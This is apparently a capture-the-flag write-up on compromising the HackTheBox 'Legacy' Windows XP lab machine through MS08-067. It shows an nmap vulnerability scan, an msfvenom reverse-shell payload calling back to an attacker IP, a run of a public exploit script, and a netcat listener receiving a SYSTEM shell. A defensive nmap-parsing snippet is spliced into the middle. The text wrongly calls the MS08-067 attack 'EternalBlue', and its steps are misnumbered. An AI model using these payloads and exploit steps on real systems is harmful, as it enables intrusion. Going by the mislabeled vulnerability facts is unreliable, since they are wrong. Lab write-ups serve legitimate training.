In this post we will see how to exploit the Legacy machine using EternalBlue, CVE-2008-4250. This machine is similar to the previous machine, Blue, but we will touch on a few other concepts, such as creating a shellcode with msfvenom and avoiding the use of zzz_exploit.py.
Reconnaissance
Port Scan
We scan the open ports on the Legacy machine with nmap:
We see that the OS running on the machine is Windows XP, so at this point we already have to think about the famous EternalBlue or one of its variants.
We can check with nmap whether the host has any known vulnerability by using the --script vuln option; in this case it will most likely report SMB vulnerabilities such as EternalBlue.
❯ nmap --script vuln -p 135,139,445 10.10.10.4 -oN Vulnschecker
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-11 05:05 CEST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.4
Host is up (0.044s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
We see that it is vulnerable and we have two options: smb-vuln-ms17-010 and smb-vuln-ms08-067. We will go with the latter, since we used the former on the Blue machine.
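The "Host script results" block above is exactly what a vulnerability-management pipeline has to triage, so here is a small added parser (my own example, not code from the writeup) that pulls each NSE script's State and CVE ids out of such output and lists the scripts reporting VULNERABLE or LIKELY VULNERABLE. The sample text is constructed from the scan above, trimmed to the lines the parser uses.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the host-script block of an `nmap --script vuln` run,
# trimmed to the lines that matter for triage (not the full page output).
SAMPLE_NMAP_VULN = """\
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
|   VULNERABLE:
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
"""

@dataclass
class Finding:
    script: str
    state: str = "UNKNOWN"               # VULNERABLE / LIKELY VULNERABLE / false / ERROR ...
    cves: list = field(default_factory=list)

SCRIPT_LINE = re.compile(r"^\|_?\s?([\w-]+):\s*(.*)$")   # "| name:" or "|_name: result"
STATE_LINE = re.compile(r"^\|\s+State:\s+(.+?)\s*$")      # indented "State: ..." detail line
CVE_RE = re.compile(r"CVE-\d{4}-\d+")

def parse_nse_vuln(text):
    """One Finding per NSE script in an nmap 'vuln' host-script block."""
    findings, current = [], None
    for line in text.splitlines():
        m = SCRIPT_LINE.match(line)
        if m:  # script header; a one-line result ("false", "ERROR: ...") is its state
            current = Finding(script=m.group(1), state=m.group(2).strip() or "UNKNOWN")
            findings.append(current)
            continue
        if current is None:
            continue
        m = STATE_LINE.match(line)
        if m:
            current.state = m.group(1)
        current.cves += [c for c in CVE_RE.findall(line) if c not in current.cves]
    return findings

def needs_patching(findings):
    """Scripts whose state nmap reports as VULNERABLE or LIKELY VULNERABLE."""
    return [f for f in findings if f.state.upper() in ("VULNERABLE", "LIKELY VULNERABLE")]
```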
Exploitation With EternalBlue
Repository
There is a GitHub repository that provides a Python script to exploit this vulnerability, CVE-2008-4250.
❯ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.5 LPORT=1234 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1488 bytes
Modifying The Script
Before using the exploit, we modify the ms08_067_2018.py script with the shellcode to define the reverse shell.
❯ python ms08_067_2018.py
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
#   Mod in 2018 by Andy Acer:
#   - Added support for selecting a target port at the command line.
#     It seemed that only 445 was previously supported.
#   - Changed library calls to correctly establish a NetBIOS session for SMB transport
#   - Changed shellcode handling to allow for variable length shellcode. Just cut and paste
#     into this source file.
#######################################################################

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
3- We run the script, passing it the appropriate parameters, in this case os=6 and port=445.
❯ python2 ms08_067_2018.py 10.10.10.4 6 445
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
#   Mod in 2018 by Andy Acer:
#   - Added support for selecting a target port at the command line.
#     It seemed that only 445 was previously supported.
#   - Changed library calls to correctly establish a NetBIOS session for SMB transport
#   - Changed shellcode handling to allow for variable length shellcode. Just cut and paste
#     into this source file.
#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish
4- We check that the reverse shell was obtained correctly.
❯ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.4] 1032
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
5- We are nt authority\system! Perfect, now we can view the flags.
Flags
user.txt
Directory of C:\Documents and Settings\john\Desktop